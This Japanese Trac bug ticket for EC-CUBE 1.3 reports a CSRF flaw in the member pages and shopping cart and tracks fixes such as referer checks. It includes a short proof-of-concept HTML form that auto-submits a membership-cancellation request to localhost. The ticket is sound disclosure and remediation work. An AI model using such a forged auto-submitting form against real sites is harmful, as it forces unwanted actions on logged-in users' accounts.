Ticket #125 (closed バグ指摘: 無効)

Opened 13 years ago

Last modified 12 years ago

CSRF脆弱性

Reported by: adati Owned by: adachi
Priority: Milestone: EC-CUBE
Component: フロント Version: 1.3系
Keywords: Cc:
修正済み:

Description

ログイン済みの状態で下記のHTMLを開くと、退会が出来てしまう。

CSRF脆弱性があるページ→mypage全般、買い物かご

CSRF脆弱性についての参考リンク:

・クロスサイトリクエストフォージェリ(CSRF)の正しい対策方法
 http://takagi-hiromitsu.jp/diary/20050427.html
・「ぼくはまちちゃん」 ――知られざるCSRF攻撃
 http://www.atmarkit.co.jp/fsecurity/column/ueno/33.html


CSRFを実行するHTMLの例

<html>
<body>
<form name="form1" id="form1" method="post" action=" http://localhost/rel/mypage/refusal.php">
<input type="hidden" name="mode" value="complete">
<script>document.form1.submit();</script>
</form>
</body>
</html>


Change History

comment:1 Changed 13 years ago by adati

  • Owner changed from somebody to adati
  • Status changed from new to assigned

マイページ>退会手続きに対応

comment:2 Changed 13 years ago by adati

管理画面で、リファラチェックを行うようにした

comment:3 Changed 13 years ago by adati

修正項目一覧と進捗状況

管理画面
[OK]リファラチェック機能

フロント
・商品レビューにURL書き込み制限機能
→[OK]conf.phpに定数追加
→SC_ErrorCheckに特定文字列を制限する関数を追加
→レビュー書き込みのところでチェックをかける

・マイページ修正
→[OK]退会手続き
→購入履歴一覧
→会員登録内容変更
→お届け先追加変更

・お問い合わせ修正

comment:4 Changed 13 years ago by adachi

  • Owner changed from adati to adachi
  • Status changed from assigned to new

comment:5 Changed 13 years ago by adachi

  • Status changed from new to assigned

comment:6 Changed 12 years ago by takegami

  • Status changed from assigned to closed
  • Resolution set to 無効
Note: See TracTickets for help on using tickets.